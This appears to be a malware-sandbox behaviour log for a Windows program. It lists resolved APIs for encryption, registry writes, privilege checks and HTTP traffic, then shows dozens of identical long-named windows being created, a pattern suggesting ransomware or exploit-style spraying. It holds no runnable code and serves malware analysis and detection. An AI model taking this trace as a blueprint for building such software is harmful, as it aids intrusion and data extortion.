Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x75ffc807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x75fe168c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x75fe5558 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x75ffd4dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MulDiv, address_out = 0x75fe1b80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x75fe588e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x75fe110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x75fe3ed3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x75fe3e8e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x75fe186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDiskFreeSpaceW, address_out = 0x75fff7aa True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x75fe34d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75fe1809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77e5e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x75fe5a4b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x77e522b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75fe7a10 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x763e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawTextW, address_out = 0x764025cf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawTextA, address_out = 0x7640aea1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDC, address_out = 0x763f72c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ReleaseDC, address_out = 0x763f7446 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x76401341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x763f9a55 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x763f78e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x763f88f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x76401361 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = FillRect, address_out = 0x76400eb6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x763f7809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x763fb17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongW, address_out = 0x763f8332 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x7644fd1e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x7640ae5f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SystemParametersInfoW, address_out = 0x763f90d3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x76400dfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x763f8a29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x763f9679 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x763f787b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77e625dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x76403559 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x76402320 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperBuffW, address_out = 0x763ffc5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfW, address_out = 0x7641e061 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadIconW, address_out = 0x763fb142 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x77820000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x77835689 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x77834f70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x778354f4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x77835f49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetPixel, address_out = 0x7783ccee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetObjectW, address_out = 0x77836c3a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetPixel, address_out = 0x7783cbfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetStockObject, address_out = 0x77834eb8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = TextOutW, address_out = 0x7783d41c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetBkColor, address_out = 0x778352d8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDIBits, address_out = 0x77836001 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x77834de0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x778358b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateFontW, address_out = 0x7783b600 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetTextColor, address_out = 0x7783522d True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x760f40fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x760f469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x760f14d6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x760f4304 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x760f0e24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x760f0e0c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x760f431c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptExportKey, address_out = 0x760e91ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x760edf14 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetKeyParam, address_out = 0x761077cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x760ee124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x760ec532 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7610779b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenKey, address_out = 0x760e8ee9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x760ec51a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x760f46ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x760f468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x760f40e6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x760f412e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x760f157a True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x76920000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathW, address_out = 0x76940468 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x76933c71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x76941e46 True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x75a60000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptBinaryToStringA, address_out = 0x75a9a8c5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x75a95d77 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x76570000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x7658ab49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpAddRequestHeadersW, address_out = 0x76594fae True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestW, address_out = 0x7659ba12 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectW, address_out = 0x7659492c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestW, address_out = 0x76594a42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x76599197 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x7658b406 True 1
Fn
Module Load module_name = PSAPI.DLL, base_address = 0x75a20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumDeviceDrivers, address_out = 0x75a214cc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetDeviceDriverBaseNameW, address_out = 0x75a21514 True 1
Fn
Thread 0xaec
255 0
Category Operation Information Success Count Logfile
Window Create class_name = #32768, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
